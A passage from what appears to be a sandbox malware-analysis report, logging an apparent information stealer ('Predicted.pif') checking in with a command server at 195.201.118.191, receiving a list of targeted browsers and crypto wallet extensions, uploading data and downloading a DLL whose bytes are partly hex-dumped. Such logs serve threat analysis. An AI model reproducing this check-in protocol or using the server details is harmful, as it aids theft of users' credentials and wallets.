2024-08-19 04:05:55 UTC	278	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 47 48 4a 44 48 44 41 45 43 42 47 43 41 4b 45 42 41 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 41 45 45 45 44 46 38 41 43 35 37 31 34 35 34 35 34 31 39 31 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 2d 31 31 65 65 2d 38 63 31 38 2d 38 30 36 65 36 66 36 65 36 39 36 33 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 44 48 44 41 45 43 42 47 43 41 4b 45 42 41 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 62 34 37 62 38 37 38 37 35 62 39 37 37 34 61 66 64 64 61 39 62 32 35 32 38 65 33 38 39 64 31 0d 0a 2d 2d 2d 2d 2d 2d 47 Data Ascii: ------GHJDHDAECBGCAKEBAEBAContent-Disposition: form-data; name="hwid"BAEEEDF8AC57145454191-a33c7340-61ca-11ee-8c18-806e6f6e6963------GHJDHDAECBGCAKEBAEBAContent-Disposition: form-data; name="build_id"1b47b87875b9774afdda9b2528e389d1------G
2024-08-19 04:05:56 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 19 Aug 2024 04:05:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-08-19 04:05:56 UTC	69	IN	Data Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 38 39 34 65 65 63 36 36 31 65 66 36 36 34 33 37 34 31 66 64 66 61 32 63 32 31 32 64 65 30 35 34 7c 31 7c 30 7c 31 7c 31 7c 30 7c 35 30 30 30 30 7c 30 0d 0a 30 0d 0a 0d 0a Data Ascii: 3a1\|1\|1\|1\|894eec661ef6643741fdfa2c212de054\|1\|0\|1\|1\|0\|50000\|00

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49848	195.201.118.191	443	7684	C:\Users\user\AppData\Local\Temp\419591\Predicted.pif

Timestamp	Bytes transferred	Direction	Data
2024-08-19 04:05:57 UTC	307	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----JDAFBKECAKFCAAAKJDAK User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Host: 195.201.118.191 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-08-19 04:05:57 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4a 44 41 46 42 4b 45 43 41 4b 46 43 41 41 41 4b 4a 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 39 34 65 65 63 36 36 31 65 66 36 36 34 33 37 34 31 66 64 66 61 32 63 32 31 32 64 65 30 35 34 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 41 46 42 4b 45 43 41 4b 46 43 41 41 41 4b 4a 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 62 34 37 62 38 37 38 37 35 62 39 37 37 34 61 66 64 64 61 39 62 32 35 32 38 65 33 38 39 64 31 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 41 46 42 4b 45 43 41 4b 46 43 41 41 41 4b 4a 44 41 4b 0d 0a 43 6f 6e 74 Data Ascii: ------JDAFBKECAKFCAAAKJDAKContent-Disposition: form-data; name="token"894eec661ef6643741fdfa2c212de054------JDAFBKECAKFCAAAKJDAKContent-Disposition: form-data; name="build_id"1b47b87875b9774afdda9b2528e389d1------JDAFBKECAKFCAAAKJDAKCont
2024-08-19 04:05:57 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 19 Aug 2024 04:05:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-08-19 04:05:57 UTC	1564	IN	Data Raw: 36 31 30 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 6f 63 6d 39 74 61 58 56 74 66 46 78 44 61 48 4a 76 62 57 6c 31 62 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 52 76 63 6d 4e 6f 66 46 78 55 62 33 4a 6a 61 46 78 56 63 32 56 79 49 45 Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49850	195.201.118.191	443	7684	C:\Users\user\AppData\Local\Temp\419591\Predicted.pif

Timestamp	Bytes transferred	Direction	Data
2024-08-19 04:05:58 UTC	307	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----IDAEHCFHJJJJECAAFBKJ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Host: 195.201.118.191 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-08-19 04:05:58 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 49 44 41 45 48 43 46 48 4a 4a 4a 4a 45 43 41 41 46 42 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 39 34 65 65 63 36 36 31 65 66 36 36 34 33 37 34 31 66 64 66 61 32 63 32 31 32 64 65 30 35 34 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 45 48 43 46 48 4a 4a 4a 4a 45 43 41 41 46 42 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 62 34 37 62 38 37 38 37 35 62 39 37 37 34 61 66 64 64 61 39 62 32 35 32 38 65 33 38 39 64 31 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 45 48 43 46 48 4a 4a 4a 4a 45 43 41 41 46 42 4b 4a 0d 0a 43 6f 6e 74 Data Ascii: ------IDAEHCFHJJJJECAAFBKJContent-Disposition: form-data; name="token"894eec661ef6643741fdfa2c212de054------IDAEHCFHJJJJECAAFBKJContent-Disposition: form-data; name="build_id"1b47b87875b9774afdda9b2528e389d1------IDAEHCFHJJJJECAAFBKJCont
2024-08-19 04:05:59 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 19 Aug 2024 04:05:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-08-19 04:05:59 UTC	5685	IN	Data Raw: 31 36 32 38 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62 Data Ascii: 1628TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49853	195.201.118.191	443	7684	C:\Users\user\AppData\Local\Temp\419591\Predicted.pif

Timestamp	Bytes transferred	Direction	Data
2024-08-19 04:05:59 UTC	307	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----GCAKKECAEGDGCBFIJEGH User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Host: 195.201.118.191 Content-Length: 332 Connection: Keep-Alive Cache-Control: no-cache
2024-08-19 04:05:59 UTC	332	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 47 43 41 4b 4b 45 43 41 45 47 44 47 43 42 46 49 4a 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 39 34 65 65 63 36 36 31 65 66 36 36 34 33 37 34 31 66 64 66 61 32 63 32 31 32 64 65 30 35 34 0d 0a 2d 2d 2d 2d 2d 2d 47 43 41 4b 4b 45 43 41 45 47 44 47 43 42 46 49 4a 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 62 34 37 62 38 37 38 37 35 62 39 37 37 34 61 66 64 64 61 39 62 32 35 32 38 65 33 38 39 64 31 0d 0a 2d 2d 2d 2d 2d 2d 47 43 41 4b 4b 45 43 41 45 47 44 47 43 42 46 49 4a 45 47 48 0d 0a 43 6f 6e 74 Data Ascii: ------GCAKKECAEGDGCBFIJEGHContent-Disposition: form-data; name="token"894eec661ef6643741fdfa2c212de054------GCAKKECAEGDGCBFIJEGHContent-Disposition: form-data; name="build_id"1b47b87875b9774afdda9b2528e389d1------GCAKKECAEGDGCBFIJEGHCont
2024-08-19 04:06:00 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 19 Aug 2024 04:06:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-08-19 04:06:00 UTC	119	IN	Data Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49856	195.201.118.191	443	7684	C:\Users\user\AppData\Local\Temp\419591\Predicted.pif

Timestamp	Bytes transferred	Direction	Data
2024-08-19 04:06:01 UTC	308	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----KJKKJKEHDBGIDGDHCFHI User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Host: 195.201.118.191 Content-Length: 6841 Connection: Keep-Alive Cache-Control: no-cache
2024-08-19 04:06:01 UTC	6841	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4b 4b 4a 4b 45 48 44 42 47 49 44 47 44 48 43 46 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 39 34 65 65 63 36 36 31 65 66 36 36 34 33 37 34 31 66 64 66 61 32 63 32 31 32 64 65 30 35 34 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4b 4a 4b 45 48 44 42 47 49 44 47 44 48 43 46 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 62 34 37 62 38 37 38 37 35 62 39 37 37 34 61 66 64 64 61 39 62 32 35 32 38 65 33 38 39 64 31 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4b 4a 4b 45 48 44 42 47 49 44 47 44 48 43 46 48 49 0d 0a 43 6f 6e 74 Data Ascii: ------KJKKJKEHDBGIDGDHCFHIContent-Disposition: form-data; name="token"894eec661ef6643741fdfa2c212de054------KJKKJKEHDBGIDGDHCFHIContent-Disposition: form-data; name="build_id"1b47b87875b9774afdda9b2528e389d1------KJKKJKEHDBGIDGDHCFHICont
2024-08-19 04:06:01 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 19 Aug 2024 04:06:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-08-19 04:06:01 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49859	195.201.118.191	443	7684	C:\Users\user\AppData\Local\Temp\419591\Predicted.pif

Timestamp	Bytes transferred	Direction	Data
2024-08-19 04:06:02 UTC	223	OUT	GET /sqlr.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Host: 195.201.118.191 Connection: Keep-Alive Cache-Control: no-cache
2024-08-19 04:06:02 UTC	261	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 19 Aug 2024 04:06:02 GMT Content-Type: application/octet-stream Content-Length: 2459136 Connection: close Last-Modified: Monday, 19-Aug-2024 04:06:02 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-08-19 04:06:02 UTC	16123	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$7ZYZYZYZnY\Y]YXYYZXYO\EYO]UYOZLYl3][Yl3Y[Yl3[Yl3[[YRichZY
2024-08-19 04:06:02 UTC	16384	IN	Data Raw: 00 e9 9c 25 1b 00 e9 3a f0 19 00 e9 9e cd 1e 00 e9 ba 58 1d 00 e9 7e 65 1b 00 e9 1b f0 1c 00 e9 01 21 1c 00 e9 b9 2a 1f 00 e9 d7 46 00 00 e9 92 83 17 00 e9 c5 ed 1e 00 e9 e8 57 03 00 e9 fa 7c 1b 00 e9 3e e1 00 00 e9 bd f4 1a 00 e9 b4 7c 00 00 e9 bf ca 1c 00 e9 4c db 1a 00 e9 31 31 1a 00 e9 34 e5 1c 00 e9 36 f1 1d 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: %:X~e!*FW\|>\|L1146
2024-08-19 04:06:02 UTC	16384	IN	Data Raw: c3 0f 1f 40 00 8a 10 3a 11 75 1a 84 d2 74 12 8a 50 01 3a 51 01 75 0e 83 c0 02 83 c1 02 84 d2 75 e4 33 c0 eb 05 1b c0 83 c8 01 85 c0 74 15 83 c6 0c 47 81 fe c0 03 00 00 72 bf 5f 5e b8 0c 00 00 00 5b c3 8d 0c 7f 8b 14 8d 38 25 24 10 8d 04 8d 34 25 24 10 85 d2 75 09 8b 10 89 14 8d 38 25 24 10 8b 4c 24 18 85 c9 5f 0f 44 ca 5e 89 08 33 c0 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 33 ff 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 53 6a 02 6a ff ff 74 24 1c 56 e8 78 0c 15 00 8b d8 83 c4 10 85 db 74 21 6a 00 ff 74 24 24 ff 74 24 24 ff 74 24 24 53 56 e8 9a 68 04 00 53 56 8b f8 Data Ascii: @:utP:Quu3tGr_^[8%$4%$u8%$L$_D^3[Vt$W3FtPh $Sjjt$Vxt!jt$$t$$t$$SVhSV
2024-08-19 04:06:02 UTC	16384	IN	Data Raw: 77 12 8d 1c 9b 46 8d 5b e8 8d 1c 59 0f be 0e 83 f9 30 7d e9 89 74 24 74 81 e3 ff ff ff 7f 89 5c 24 30 83 f9 6c 75 35 4e 0f be 4e 01 46 89 74 24 74 85 c9 0f 85 f0 fd ff ff eb 21 0f be 4e 01 46 c6 44 24 37 01 89 74 24 74 83 f9 6c 75 0e 0f be 4e 01 46 89 74 24 74 c6 44 24 37 02 8b 44 24 38 33 f6 89 44 24 58 ba 70 53 21 10 c7 44 24 50 70 53 21 10 c6 44 24 2e 11 0f be 02 3b c8 74 16 83 c2 06 46 81 fa fa 53 21 10 7c ed 8a 4c 24 2e 8b 54 24 50 eb 19 8d 04 76 8a 0c 45 73 53 21 10 8d 14 45 70 53 21 10 89 54 24 50 88 4c 24 2e 0f b6 c1 83 f8 10 0f 87 d9 14 00 00 ff 24 85 24 e1 00 10 c6 44 24 37 01 c6 44 24 43 00 f6 42 02 01 0f 84 97 00 00 00 80 7c 24 2d 00 74 44 8b 74 24 70 8b 56 04 39 16 7f 22 0f 57 c0 66 0f 13 44 24 68 8b 4c 24 6c 8b 74 24 68 8a 54 24 35 89 74 24 Data Ascii: wF[Y0}t$t\$0lu5NNFt$t!NFD$7t$tluNFt$tD$7D$83D$XpS!D$PpS!D$.;tFS!\|L$.T$PvEsS!EpS!T$PL$.$$D$7D$CB\|$-tDt$pV9"WfD$hL$lt$hT$5t$
2024-08-19 04:06:02 UTC	16384	IN	Data Raw: 20 89 44 24 24 3b c2 7f 0c 7c 18 8b 44 24 14 3b c8 73 06 eb 0e 8b 44 24 14 8b c8 89 44 24 20 89 54 24 24 a1 08 22 24 10 03 44 24 10 99 8b f8 8b ea 85 f6 0f 85 6b 01 00 00 3b 6c 24 24 0f 8f 91 00 00 00 7c 08 3b f9 0f 83 87 00 00 00 8b 44 24 10 99 6a 00 8b ca c7 44 24 48 00 00 00 00 8d 54 24 48 89 44 24 38 52 51 50 55 57 89 4c 24 50 e8 38 3a ff ff 40 50 8b 44 24 34 50 8b 80 dc 00 00 00 ff d0 8b f0 83 c4 10 85 f6 75 1e 8b 54 24 1c 8b 44 24 44 55 57 ff 74 24 18 8b 0a ff 70 04 52 8b 41 0c ff d0 83 c4 14 8b f0 8b 44 24 44 85 c0 74 09 50 e8 dd f4 12 00 83 c4 04 03 7c 24 34 8b 4c 24 20 13 6c 24 38 85 f6 0f 84 6a ff ff ff e9 d0 00 00 00 8b 7c 24 1c 8d 4c 24 38 51 57 8b 07 8b 40 18 ff d0 8b f0 83 c4 08 85 f6 0f 85 b2 00 00 00 8b 4c 24 2c 39 4c 24 3c 7c 1e 7f 0a 8b Data Ascii: D$$;\|D$;sD$D$ T$$"$D$k;l$$\|;D$jD$HT$HD$8RQPUWL$P8:@PD$4PuT$D$DUWt$pRAD$DtP\|$4L$ l$8j\|$L$8QW@L$,9L$<\|
2024-08-19 04:06:02 UTC	16384	IN	Data Raw: 10 be 07 00 00 00 eb 32 c7 40 08 01 00 00 00 33 ff c7 40 0c 00 00 00 00 66 c7 40 11 01 00 8b 44 24 10 56 89 46 40 e8 3a 27 0d 00 83 c4 04 8b f0 eb 08 8b 7c 24 10 8b 74 24 0c 85 ff 0f 84 9d 00 00 00 83 47 10 ff 0f 85 93 00 00 00 ff 4b 3c 83 7f 08 01 75 0d 83 7f 0c 00 75 07 c7 43 1c ff ff ff ff 8b 07 85 c0 74 0e 50 53 e8 46 87 0a 00 83 c4 08 85 c0 75 0a 57 53 e8 38 88 0a 00 83 c4 08 57 53 e8 5e 81 0a 00 83 c4 08 83 3d 18 20 24 10 00 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 57 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 57 ff 15 3c 20 24 10 a1 38 82 24 10 83 c4 08 85 c0 74 13 50 ff 15 70 20 24 10 eb 07 57 ff 15 3c 20 24 10 83 c4 04 53 e8 a0 17 0d 00 83 c4 04 8b c6 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: 2@3@f@D$VF@:'\|$t$GK<uuCtPSFuWS8WS^= $tB8$tPh $WD $)$$W< $8$tPp $W< $S_^[]
2024-08-19 04:06:02 UTC	16384	IN	Data Raw: c4 04 85 f6 74 64 8b 7c 24 14 e9 68 fe ff ff 0f b7 86 90 00 00 00 8b de 8b 54 24 10 8b 4c 24 24 8b 6c 24 20 89 47 10 8b 86 98 00 00 00 c1 e8 06 83 e0 01 89 54 24 10 89 47 14 80 bb 97 00 00 00 02 89 4c 24 14 0f 85 c8 fe ff ff b8 01 00 00 00 89 4c 24 14 89 54 24 10 e9 b8 fe ff ff 5f 5e 5d b8 07 00 00 00 5b 83 c4 18 c3 5f 5e 5d 33 c0 5b 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: td\|$hT$L$$l$ GT$GL$L$T$_^][_^]3[
2024-08-19 04:06:02 UTC	16384	IN	Data Raw: c4 18 5f 5e 5d 5b 59 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 7c 24 14 8b 46 10 8b 56 0c 8d 0c 80 8b 42 68 ff 74 88 fc ff 77 04 ff 37 e8 ac f3 11 00 83 c4 0c 85 c0 74 0b ff 37 56 e8 d3 67 fe ff 83 c4 08 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68 2c 67 21 10 ff 74 24 14 e8 bc d7 0d 00 83 c4 14 c3 cc cc Data Ascii: _^][YVt$W\|$FVBhtw7t7Vg_^jjjh,g!t$
2024-08-19 04:06:02 UTC	16384	IN	Data Raw: 2c ff 46 2c 5e c3 8b 4c 24 0c 33 d2 8b 71 14 8b 41 08 f7 76 34 8b 46 38 8d 14 90 8b 02 3b c1 74 0d 0f 1f 40 00 8d 50 10 8b 02 3b c1 75 f7 8b 40 10 89 02 ff 4e 30 66 83 79 0c 00 8b 71 14 74 10 8b 46 3c 89 41 10 8b 46 04 89 4e 3c 5e ff 08 c3 ff 31 e8 6e 5a 0a 00 8b 46 04 83 c4 04 ff 08 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 4c 24 04 8b 54 24 10 56 57 8b 71 0c 85 f6 74 3c 8b 06 83 f8 01 74 1f 83 f8 02 74 1a 83 f8 05 74 15 33 ff 83 f8 03 75 26 bf 01 00 00 00 85 d7 74 1d 5f 33 c0 5e c3 83 7c 24 10 01 75 f4 83 7c 24 14 01 75 ed 5f b8 05 00 00 00 5e c3 33 ff 8b 41 04 52 ff 74 24 18 8b 08 ff 74 24 18 50 8b 41 38 ff d0 83 c4 10 85 ff 74 1c 85 c0 75 18 8b 4c 24 14 ba 01 00 00 00 d3 e2 8b Data Ascii: ,F,^L$3qAv4F8;t@P;u@N0fyqtF<AFN<^1nZF^L$T$VWqt<ttt3u&t_3^\|$u\|$u_^3ARt$t$PA8tuL$
